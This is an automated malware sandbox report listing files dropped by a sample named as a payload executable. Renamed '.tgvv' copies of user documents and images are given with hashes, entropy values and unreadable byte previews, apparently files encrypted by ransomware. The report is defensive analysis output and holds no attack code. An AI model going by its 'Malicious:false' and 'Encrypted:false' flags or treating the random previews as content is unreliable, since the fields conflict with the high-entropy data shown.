                                                                                                      Preview:DTBZGv:i.^...F...............Ry.bz.-ul.y.^...a......n)H.z.T..C......%8Q*..s..B)...\s..j]......"._.....~..Lb"......S>...v..M.9..].._SH.)."..ms..u.B..A.....EV..6.j.+.....&. gC.3.C.,......A....9..xg...G.....>...'......s..^.Z.0^...v,.fh/3.......\8...p.....C...;B........E.}OY.6.Z..t3.s6`=.u3...}......g..(...B....6.?@.>T.3..+.ru.q.$........"*>..I.c...%./.J..a(n.M...R.u.Zw?X_'.y.L=..r.&R..k..........7zgf..'..d..?.f..'.J[...:l./...z....@......NBKi2`^@....&..L+.TC.E.q....W.....R.1Gx...I`U........."...w...,..o.=.'.." .....s..W...&[.r*~..O,......E.r.....'.C.....&..g........9.x......9|.K.D.o...".R.j.*......Y..#.}.#ELZ........v3...3........q..<y.~1.a...".*e..lC..].C.p.O..g...+i.p..9..nRzn[L9...=n..3..;.8cR.3..%*Z....*..(..*f.n...7..Q...?.;p....UI.$.>z.}..+..3...g.[....6.oRs....K0.._.V...S..T..V......SM@/?.....4.Q.X.C.....v....OW!.'...v.o[M7E...:..v...B(*-B....B*.....R.~.lR.o...2......,.......SDt....Qb.[...\....z[.X...\S... .....E9d..J.hVS

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\DVWHKMNFNN.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.8625775918544
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:3B/RKyORSpH10L8QFm0baDSmDPjvIpk47XTq/WR8OtokL+gyaLv6bD:3BEyOkpaLzTbaXrq7LTSi8cZLwD
                                                                                                      MD5:5799C43FA85A8D154F188BE042D0B3B3
                                                                                                      SHA1:98364B1B1C1BDFAE2A89436102E02EAD58DA6235
                                                                                                      SHA-256:908DD95A5706364D5FA0705C302B1823EB0CD97763E92B0DC774F5F6D9B21CE6
                                                                                                      SHA-512:AC5F8285BD07B9C9AD1F1512DC81F6C07A075B64A752691DEC79F55EDF9A3CD8DA94D396010DA21ED7BC6FECE6FF0A179735D2519F60EB3ADAEA4A26D056BECC
                                                                                                      Malicious:false
                                                                                                      Preview:DVWHKw..z>._.[.=...!.%..h.....U..]W.&O.9..T~....v7?....v`..~../K.%......#+.$..........-..=.~E.d."...(W...../p|l9W..d7~G......`.8 ..%.=...k...K.N.<.._..s.9D....OD.tN...)....%...L.."..-.Z8.....Rhk.B.[5.>Q.T.x..LQ..Mf.\.s...]...Mn........[..I#.fl.A..\.Y...\.N....@...:...4...Q>.J..7.(..J\Z2...|D..`.t..J..V..Ji_."{"..L.9x..N1.C.U...].!.F..Il....<....D..-K.:..K.....&..Xr...3.P.....y.q._.........[..Ac$y....L.p..:...e...K.z......,..".$.L.KT...l..\=.G,..W.F...XXL3ES:.u[E3$.^.c^..7..Q...R.j>....D.....=..3S..N/e.v....O..LVA.s[.......w.F.....h._.C......&..x<?w..j../..d.Z.V......v.V......,.=...........WC.T....[.../cU...+.h.B..:.....[.....O..?l....kp...o..42..t....R;&0xY@M2..h...G.."\+..^.z`.D!..u.>...-Y$.P.....&......@jD...)l..-.......{ySv....4.j...I.%....J.V6.$..3.C...]]pk...*....Q|.W..C...r.dG.[....K..=9p.@..G!x_f3'...K..............gMM....._i.2.>j.)N..):K...R...x.c.nt.O4s....i.e!...i....N...gb..g..@R..Hl..`.T....n..opG,n..U#+.MD<3.#..l....

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\EDCVNYNUAA.jpg.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.86490038812188
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Od2VQ+6pU4Mg4uLNib7aheF2r380z0W41vx7PXJC70P7ip5q9gid4Ov6bD:Odqphuxiyhe8Fz0Wuv9c702kg8wD
                                                                                                      MD5:3ADA771FA39F652D8A93A8E2A80DB0C3
                                                                                                      SHA1:8A77582B229F94DB03662A94F8B90183E436DD81
                                                                                                      SHA-256:B0E59826775E28A6C08F3D442A57AF3D887BC4F71AF14739D795532FDFAC3164
                                                                                                      SHA-512:D6AF5E4C632FFF4CD11132034FACFD1A1DBBD27B46C80A5CAD331D56541F6CB8983374F8186A79205BD6331E0C82650526AB53765E83F8FBEB906BE1457B5825
                                                                                                      Malicious:false
                                                                                                      Preview:EDCVN%V.)9=j....9`..4....Y:..u...aH....l./.$....<?..C4.h_....W.....y.e^..8.D%...........mRO...9U..=."..7c...m..0M.A.iM.<.R.[.* ..R.[...1r.t6..V..N [...c.@.\..Ce........Y.cC.....3.c...._.c...i..cp...=0..)..>........e.U...x.3f].~...P...i.....UaeJ`)]m..e....t.If..N.Y.1.;..%x.*..[~..._...0]...eHi.|.......z..n>.TG.. !...s.!...s.1........'RX.Pt..+.z@..u..C.xE...=L...11.<...R..w.{&.$..gF.....A....."..8p.....NQ..5H-+n..#D..r...c.iR.v.r|...G`......W^..V.w.L..A.4nb......U...k._..J... 6.pN%0...p.,.@..6.J...s..&..k......6*j...3.h.k..g. ..q..B.M..}".P....O.d..2'..JQ.....K....C..WC.(.a....4......ri..2.r.9..D.R......Z.>.....E(A."...Oj.0.....6...;........@.p..\./.o.6]M@......O...K.I..[=gZ.Ix5.r7.!s=.Fw.^|..<.^.......?....)..*iJ.T..Ge..._+....'..v.>...=.18....p.x?..2F.....;!.....T.....k.[..).......M.*...R.^.D..k..fJ...F.M8.7....uIqY...#!(N..z...k.L...t.>Q..G.w?Cg.%..|...k.n..<.q.(......7...*_.&.;.w." .{.3<.$..|.....q.K....[;.......q.9qh\.Y`u....

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\EDCVNYNUAA.mp3.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.848455547958467
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:3/KPw5k0z2x9l65JL8QDG4dCizslFZrAd0s/c7WrDbnFt9URD9dv6bD:3A06x9lSS1ZEsbZrM7GpnwD
                                                                                                      MD5:E8C9FA90C81E9920EACFF363FEEFDCE3
                                                                                                      SHA1:51BD960E5139F0D707B9C128C29966650F75AB69
                                                                                                      SHA-256:FF9FE82F1F9F062B17EF47A5914905B34E5DA847F85695D1646C4E6FBD589355
                                                                                                      SHA-512:485E3E54DE742706B772276C66094E5CCBA7499AAE800A790F8D1F2A029246800FC8F664E683FF552F41E7BB6EBC64CB63E5519A8BBC1766FC8DCB4CF62F3F04
                                                                                                      Malicious:false
                                                                                                      Preview:EDCVN.Qi.Al-.$-..{j0l..S..o.;L..u......v..Zg...........F...0&.0.'DG.%.+../[....gt...8....r:.......s....Ox!.........A.&v.+*C..ah...l.=j.N3"..v2...g.E..2.8......A?..F....I...dU^...*.tZK..O..R.}..K6.J.).+..1.K.L9.mq..p..U.....'F..p..>.......O..X..~.w....V..U0,;.bML..&.F.f#6...E`.an.e>t.[.$......\...;.=.r.v..Fo.?..+..T[.n....>.W\..0C.A .......\q.V..D...[|...s.Y...^.P./P)D...x......B.~..{..pG.fJW.`8..."?$..j o..pN...,.$h7W.t`"8M..'+..A.JI....Z.e.......;...*.0Y....*d....S.j.E...s..y}6.H\.."t'.c.]k..$.@*0v..t)...|....y?..K?....1.n.....n...pi..r)L;'..[Q. :[1.k.e..6.t..w.. ....?.."..GV.4.....o.h........V.u..,.d...}.}......i.......e......j.@.6..f'$h!.......c.#....aj...!.G.P..........NL.....Xh6..".....#.*..UN....]Bjf$...4.ed.......V..1.{..7.t.aV .........#4*hb{..w....amHTK....nn...G.Y.?E......K7.d...+.......J....X.......D...G..._h..D.@s`....."...K.._D...<........7..cP,...k...C..lVF..k.Ho...n.!.q4....'....Z......6.wKXJ.coa.....e.=..3.i>&....(#.[ .

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\EDCVNYNUAA.pdf.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.84109425492658
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Mc8TkoGghpJhoZCWlj56UbgUm/DW1DZc5W3y4+TBezCsk9aZr5uSkxKYCDHxv6bD:MzQcpJhojM9K1DyM1+TIzCsqmdxBdwD
                                                                                                      MD5:E1E5CCEFDA2779D5F50C64AC2F4F2192
                                                                                                      SHA1:D7368A2BE2ACC5CB51D2437EEB473E601D175938
                                                                                                      SHA-256:9E4CB38892A1D51D56729C768C4AE05CAB6EA586BF0B9547BFFC64DBC89AE9ED
                                                                                                      SHA-512:132BEB7EE26E850442675CE76A0B6E160BC309B11CA8AF702CC58F466AD2E8D085CCF29D99EB79F5CE12A35B30CA154918215E8AA1B32E629AE27599B79D8B4C
                                                                                                      Malicious:false
                                                                                                      Preview:EDCVNm.q.z...#W...i...a..j.!LJ@.....e..xj)}.=...IxG.......GX=.o8..g4$@z.I$.'.....J).<....V.CL?...}.b...9mu.>...@.8p...!...Id..lz..t...A.u.qb.7...K..h.e..G...g.7..).}N..xC.6...|?.-k.L..).I.......k>...].Y..;..".....M.o.~yA8}..3.USu........WOE\x.\..].......`t...}.D.....e...y..c7..u......:r4.g....t.J.'/..Jkf..w..S3..u69....CC.......54}.\.-.g.@km..*N..vS...Nk.......L.H.....*......X.....rU..M..n.i...7D......Y.9...M..[A./....r]u..?Q$.O1...a.@...A........8l._.D.x.q.._e...%...SP$..2...vr.;..#X....u.x...q6E..3.V...J....B.J.B....._......U.k..*.C|].Y.S]s..oI...5y.B.....O....9..FI.0.#5.N..0".R.^.1..f.-..,...i..kh.K..zHN5:.GL7....t'sn.....k.../.~#P......u.>.C.K|K.8j&:O(..h.%.7f...Y=..Ve..!..~....h...G.W...H...`......"}.\....2..]'...q..3........*}...G.W..e..En.A.:.NK`).4.<>..........W(..S...Bj..6...^..bn....S..6..r..=.....`RmS......+@l.-g.2..M.P.....4P....o..(k.e5..1C.OP}G.F...z!.g@..vy...).B<!n.d.V.<.b~w-...c4..YU..G/q<.dn.r.S>..I...q.~

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\GRXZDKKVDB.png.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.8587653292048545
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:pN1cyjnFd5pLjyDqF2h5AFvyByjV/lw9I0gs4MTcr+js10dFbNnv6bD:f9VpnyDAUUqExlw60gsP4+X/wD
                                                                                                      MD5:CA7CBD4030147A892E6E3C6AC6F3E897
                                                                                                      SHA1:096CC4BD7332F62117F67A5A583FD0965DA8C6EF
                                                                                                      SHA-256:72B727C7A7881140D31AF59145C11F49EE75960577F1F4ACB3490A9609914A48
                                                                                                      SHA-512:913E97200C1D7354E3F934DF45F842E01208B22DB3115EE4E6CA9E2E417D527654CF3D209125DDCC3B74841D9110090E48E57DB9AFA0880F0FA6FD4BD1584AEC
                                                                                                      Malicious:false
                                                                                                      Preview:GRXZD...rF..m..-k......e.....G>U....t.....q}g.F./7)..UuRIo..u.I.....~...^...!.......ba.7.0..]O....;E....5J@n..T*>Y.<..CuS.......C.L1.e:(SAV]....d....]xwC....F..mT.!.([...YdHuvt....a.{..n.\s.H...\.(..|6......%;r........8%..P..^S.^....T@U..p....}.E..7?.*."......f..w...ZU..;_<..;..{.]I..8..V.q.:).n...X..<.....i.IV@.o.h|.........:D8m;..b..x.N}^...D...B..KK........3.2.e........../.:..v...B0...m^{.O.......H;.@..w2.J-.z..;ZGm.."...z.y.2..A7e.XCn.yl.$?n.|dG...Ht.8Cp{\..0.U...zl.FL]...d<[.O..Y.y~~@...............,.i.......5...um..Z..'.n!,...Q16.e..:.W.OU.....;.>......4..GV36^......e`..5W.1.I.oh...(-u~....E.....@jf..*....%.|.......k.......T].t....eeK..4..xA'.#..2..A=b...A.Nx...,1f{....N.j..#...g. .i.I\..s.).......RO.`... M.Z.Dr.....)..."S.d..J.O.......9.....Y!.:B2.$J.1D.V....7E.t.$A.><.ym.#c..W}.K.+@.....e.+.'.$h=....o..n.....-5.e..JB5b..m......s.w0..*...}..q._..bD3....{.....^($...<..o\ l.:...I....w%]..#.[>..-j.&.6..da.G.@....)..Wg..Ds.h..G

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\HQJBRDYKDE.jpg.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.835061321427616
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:B9cHRw9NxHjmyurodl8JC78RGJ93s7WGRXnAboEOMpv6bD:HpHjmyusT8JsAG7sXwbXTwD
                                                                                                      MD5:FCC45106FC07D44BDDDC258918BAFB7F
                                                                                                      SHA1:FF912406F42CD8BEDD64EC7008E1B926887F7B88
                                                                                                      SHA-256:3AB0978F402D5FB96D7F5FBC39911EDC5D79B827E7C5F635B4335A9899D99EF5
                                                                                                      SHA-512:94288F27558FDE2382159891EC899E3CC25420286F2200053A943954FB43D788E83041679788B7DA310BE261DBE9DCE5BD3A041B07B8B1D159A17D87B1B4C0FC
                                                                                                      Malicious:false
                                                                                                      Preview:HQJBR........U'...W.|}I....7...03;D.JgA..\.z..k..L7.........Z.mE.aM....,9...;.*.@7\...6.aT.}.).............YT.M6'.cr.Ip....#Xy.....hA".vSP]<..k.<.T....g[.C.??.....*..e.y.J..m....E_.S6....{|.D...`UKm...Z..*.N...-.V..EeZO.....q...Y(Z......[l..6.Q.Q2*........g.%_#>H.wAR.cDe%..'\|...SN...{.CH....`..b,a..7./.X..........5?..w.E.....t.[Od..C.~ ..T.....`....!E.k..3.6H7l/.R........O.IM}..0P.....\V3...Y.n,Z..=....5..HGHY....Ky....D+.6.8<....5.T5..I...%...;..T.....?~A..<t.R..p....MipGI......"....+ .c.k..BO.IU.FaP...(......$.......W.<a...vsh.B.fb....vb..,..W&3...1...&....3.&X../........P...O..u.Y1...U=.g....m...;J.p....P`G<.T.F..E"....I....\..).K....y0)..'v.%...,".4...'1^.C7.....#....^u<h?a.\2.V).....OxQ.7.&........$J.........N.._.R..7..e..!.$.,.i.4.$E.....Vm8*..b...!. KT.'.q..vwg{...|...8.....b}...'c|b=.c...r}.-....r.zz.........y0e...'.q:...,K6{.."b..........~..TUo.*&A1.....W.G...".T.R5Q......79........b......4...su2.>."...6......<.2.?K.U/

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\HQJBRDYKDE.xlsx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.868986404608873
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:qbg6AuPrmhcpqPj56+tjzUmkN/iMYJvgbFuvzxwSoJ+gDLiOP+av6bD:qbg6AWrmjdPjzE/i/JviFuvzxwbpHPDs
                                                                                                      MD5:DBBCE967EDB823A1042D4BEEB22A8D02
                                                                                                      SHA1:4D4EB86D85F84CE467FD9948BA2B693E8DE46845
                                                                                                      SHA-256:982ED5AE13F51A90FB9767DC2CAD67454ADEA07D2949FA51A6FC08A5CD548205
                                                                                                      SHA-512:4E2A2DA2447B7AC7DAE442F20FF1B8B699053BA8CF3F0AF17749F9C891432D8830B9D78EBE0CEE24635467B16632BFE24984B2A9F696B5966903C0BEB07E4F97
                                                                                                      Malicious:false
                                                                                                      Preview:HQJBR......DX.....%.......,-.ZM..<..8..>.&b..]aF..x..U.=!."...z.~.[.....K;.~.w..c .....k.R%.y.'._X?.1...#..nyM..W.o.k..*Sdm!.m...>)W..1;.....kb..{=..`..i......Q....G[.....>Sa..P.k...._.sW.n.h,..lV........e...}b..H.._.....[.}...c......H......R$.!$.$.e..Or.....2.U...;@..M.......?..D.AS......(.n.C..W..eK.....P.....&5.J.I..kC*....Re6M..>.......^].....g.7...'..F.fOO....).m..J9*7.:.2.G;(.j.2...'..D.....m.f.*[.U`.TOj..FB....g..;.2...Vp.|=.J:0.........[.6....|X...T&.fyPV.F......B.RE....c.....\..T.a...O..BU}Mf..n.j..=...Q...i/F...pg[.Y..Y...<..uf.._^g[uw.....U1.......*..j,..,5...x=..G.3^e..9..2.......O'.....^..|.0..&.....2.2....).2S#y.x.i^.k....O.n.x..A......p..0u...{Rg....%#......Sd...T...@...2n.X2t..V-.3..g.>.`.....3.^....~.........P.m....!I....".u...2...w.Kp/H"~-*.S.y.r.Y.~...q8....J.....eu.......}$..k.SD#.E.@..?......w.w..C.?..+^Q*.p...D~...U?..H.rVn.3"$.....`...$.0....:..6.......h....%?>T.+.=.(.....y...."..#..1...WQ....T...o..suz.....

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\HTAGVDFUIE.docx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.863079897846557
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:aJnlUOeJvh7a1hPOydwtt/Bd3r299A/5NMM3Li7Qr0ln1nv6bD:cnlUOGvh7a1toznDlbmQ4l1nwD
                                                                                                      MD5:A932C7CD63F0101AEFF3A1BB65F0F63D
                                                                                                      SHA1:349CF5F750104AE89DBE0C7A83D2951C88F133EC
                                                                                                      SHA-256:5CD1460B285A23F2D812A45D92CD0C7AD1FD7682FA24355E07AD9B0F3C603D6D
                                                                                                      SHA-512:C44923F7CE04C1A61A2DF25F7B62ABD2CD642304EFD53976592EF92D0545F64F7655F0B7E87B1503E8990C8FABC519C113FF8FB44DD8CD4CF8A0C8D5A5267C4B
                                                                                                      Malicious:false
                                                                                                      Preview:HTAGV.d]...|..R.F.h......P`Y+I..3..i......)s.F..x.#....x..QV......WUlR..............g.HKOi.(.Qsu..q.50.Z..Ofh....Uz.j.%..p.p.y...D^..Oe.7J|DV.q.R....y..L..^a.2.....\..7......+li....@b.^ji...._.8..U..T.].N..\o..*b..."..t.{.../........r.k=....R0..$X.:. .:.....(..B...{w...A....}.>.....Y.LC.a..T#.p...k.........zO).Y[bx....a{.B.:]."T>G.p.%yo]....Y.......mU.u.5..aJ.bF...l..........}......_..5$.....}M...U)....Qai..Z.......a.........RPX~.}w.2.3.10.?......E3.9.@:.*...#.D]n7......MC...1W7<b...?......#..}..........<C).tx.m................B]...t.P(3)..!.....*......z....g...A...T..V....7|.o..j....,..(.wot.1.c...I.Wo.p.t\.....p.....;._N..QN.u......y].y..u...}.x....~8.^v..X..^.agO...d3...$:q.%i.]1...F$S".dP.(q.p.S..,-...M(...l......C.C..8.I.p.....d..z..+;...#..uG.....<.(Pv#.........].;ycj.*.U.S..z....".W..R.e..C...OAk.kaR.&.g.W#,L.y?....b.....>$1.E.Y.! ?....r.(...D..0.A...9......*.A.g.......T.Z.PC.`..+..u..el9..7...[j..[K.....p..[\....+..+....]....

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\HTAGVDFUIE.pdf.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.86715531453301
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ypfZnqziqFK1bBkbkVRex0gi6EM2kfYOqKe/C42U9zNCvh2Qfv6bD:MZY9FABXrex9EM2CqDb9hCZ2QfwD
                                                                                                      MD5:A8611A40174452B39A985050EE0598BA
                                                                                                      SHA1:2AA2A0D58F46395CF95EED849739A34BC3E14DA4
                                                                                                      SHA-256:A656E7CF0D3A4327B85F947503164582C81BF1840605B07D40E5F633392A462D
                                                                                                      SHA-512:6EC3531D5632B78AF603E14BB065E2F851702488807894BE482A0A3BC957D6C0A0D4A4D3E5128B7429A8E8C4A74EF9DE0FB958CCCB9C1A09349E9481AB0BDF3F
                                                                                                      Malicious:false
                                                                                                      Preview:HTAGV.i...4.U.9V6/.wP;.eK.(.A.......)b..G...(..F...e.q...rO..p..W..J3+.35.....c..C........Z<YUqn...>.@)&../........(Y..n...C2d.l...,..K.M%.......G.FZ=...._I.2O.yP...4....iu..q.t.....fAJ.0...L?. v...nh....h...b..\.....J....%F-.W....qw...#..;..h..Ym...W.5..}.J7....^...vYO..^.i..#T.....'....`.;...\..!.i9..d.s.a....7.......Xu+..........a...M..(./.W...3\...^m).....?..rD..._........0..yr....$...2; .7f.1....J.^M....."j.)vn(.Z....X..Gfm!wI.....;..~.ZP.....,'m.3....O...bF.....BG..V..%....WlX*.j0..o....q.^.~...i../..y..$RK.j..g.i."..m-.....9H.R..P%.........3.}[.A....../...u..n..+.j.*_8.\9.l..w....*[.o.Q5<`.)......h......v...f.J~...._G...'.IY.....Em...Wo....j.h...S.f.,I..{...E^.ZUwj4cF.k-.Pk..[.J......U.v....o.z0.atq.K....cl}?8.[.?.d1..Lk...._"r..R.".qg..HB..=...@b.g.....T...-aKck:@.?"..Bd.5n~...*.EkB....P.$..CZ..u.&J...".I%X.......rQ...C.. ..p"W&.3+{.+.*._A....... .}..G....lw..N.!.b..h..+-...a....3.......z.~..a.I...;y8...N..^dIR....~.n...A....|(..%...GH.&..

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\JSDNGYCOWY.jpg.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.862213534559089
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:OL6DQR5v8fjozsNfpbsgI3eZeZovj72hyif8RryuiRDi3ERK1Dv6bD:OLoQROLoIlsMrvjKhtURTitTKBwD
                                                                                                      MD5:C84F9EEAB271737344817043A1B387F2
                                                                                                      SHA1:1D39C27D5C42C85A33ECDE745780D15CF98D801F
                                                                                                      SHA-256:C966EAC4F24923CB3B4499580FAD9AE6FE81ECD98696A125E2DDB7FB5ED215CA
                                                                                                      SHA-512:B479C7C2872D9849D39A5E938D08FCA1D861A7ADC939D80FE87EF7F0BFB0144C1D4004A8F5058B682C80F48C35AD64FDA5546947A59DF8B7FB00B959D61FC7AB
                                                                                                      Malicious:false
                                                                                                      Preview:JSDNG.hT..../(....]N. $Kl...V..U.z.5O.G.$.....+IS.G#O.....;.sq.MP.....v............H.q.'....u$..8.\.]^r<{.oI...%^...hT...n9.I.t...]....V.9..1.....2..(.{.....-....pA.d..@+.HL=.8.\..p.......b....7..6..v...j.O/^9...!..9"...i.t.l.J..a......W.'$7..)Jr.2[/.;..x..ub....&......+.........?.}m.mi7./..D.1.'.,Dn......7k'...[......N...$..d..8.,t.....+.\;...F.a.+6=#_.?...&...ze.I.f....qx....GNfC...........j...d.t...e...T...t._xSWc..G...'....d..cc....%.<.@V/E........z.\2.C;......W....@..\J...eu.]dd...{.?...H.y..... .0.({..+.`.......Us.mZ.......5.....N.s..D.&S$.,uT.dc.PP...J..^.G...,2.36.5X.`t.|q...[.Y..rt.]..S.Z%....Y.Y..g..X....*.z.u.'.B..) ..\A*...d..K..t..F.R....!..h..PF.o.E.x"..GK....)f....lNSd....,G.XL(..(....5...$.$..6...-..."...6s.g:.8... ..xP:...tR;..ghx.b>..9P...rA...$..%...Q....Np...=..-G0..C....G.......%....;1..A..B.-..&.L..)....E.^$.}V.v&.....t..Iz?0.L....|......um\.....!w4....s2....G..4..v.r.....5.?a.F.5.%N*n1.....Y...C........uJ..v..I.

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KATAXZVCPS.jpg.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.845797905050693
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:LMKtzUXqjeSb5DLviVN9milLNGu/x9FDytjpnS0DjFRRb2Cpj6yxaYzeNXv6bD:LMKKXqF5XqVOil/9FD+tnS0Dj78C16M9
                                                                                                      MD5:BB4532B43923A63C66319E549622072A
                                                                                                      SHA1:441EDDA888EB38E34895596F26527BBE26F015C1
                                                                                                      SHA-256:21EDD85EB458F9601D53833406F1BBC84452CC3EDDB17ADAA03FF72F06525739
                                                                                                      SHA-512:58E78C2DE9EA956CA067C2ADE046024CF7869FC40C7FCA179B25E271096726522463ABD1A5B31EAC79BF3D6F8571144C71E747ADC3A0D6BB5B965117C24F8D06
                                                                                                      Malicious:false
                                                                                                      Preview:KATAX.u...*.E.?0>D..D..3....G...$...dg9............y........4@d..<................lbK.g...-.1..`.z....L...'He...S......Q0}Q0 M.....y.Q...........dj.......x...........s..!..R..l.........D%...e.1..C..3.1..V:..../.kZ...0.".Hw....R..T.?..*.S..a..-nR..6iX.{.....<...#D..)VQ.F...Ppw.&...C.eyW...].^-B3UTT>..=../lDJ..T..B....n...Xw>?..5..9.].dJ.z@.#....l9.1.-.z....D... JI.y.i.......IX/..+.}.w...oc..A#.../-.5....j...s..y..x.....h....;.cz!`../..b.)3.K5J.hK.Y.X.- . .%K.:jQ.?Z.O.......i..a...+B..z..ydP......f..5G..;.qZ..<.?...9dM.Y...uWB.ih..C!r.X..om7.... ..dBI.'.X..$..o.,......n..%9.U....#._C.(..E.U..2..jZ.KP.V.'0O.LwUi.j<x...^..m.p.z.K{ .b7.l...........-...P~b...geo......C...F...9...N...}.(...b.w.].1n....f...v."x.GV_,U=.2..2}..8....@...|3zs.7.... M}....u..o._.+,H..M...Bx .r.q..".D.0.....`..aQj..l.....gd2..."...P....}..d9.8H.....H.Q..KI.x...b.Dsk......1...C........*-....h#?l...1.....:2..e%^tk$.|...h....0..sB..)=...f.._U0.#U.X-..*C.)- T.h..Y........?

                                                                                                      C:\Users\user\Application Data\Microsoft\Windows\Recent\KATAXZVCPS.xlsx.tgvv (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.85116890561353
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:AY5qofm4+MCKBVSmJibQ+OxHDwUZpoOf90RD9v+Dhk9fMHwgv6bD:8hyBVSo+GcUOi90RBv+VVHwgwD
                                                                                                      MD5:BD4CC4EE1C16DC4A6BC2237B6ABB1EFB
                                                                                                      SHA1:B1DDE237948FCD2F7344D1AA7CC5C453460CE2D8
                                                                                                      SHA-256:4EE10B1841CE04005BD7192AD86D85C1511C065BABFEBBDC3B515654BB1C1C5A
                                                                                                      SHA-512:9443FD5A5071C14703A8F02676D23B5B92783B2C6CE3FBECF4EB119C16C84F4D849FAC35E19DFAD82F29D6164117E652C2B0B80227CBEC6BBD78E3F0F747EC40
                                                                                                      Malicious:false
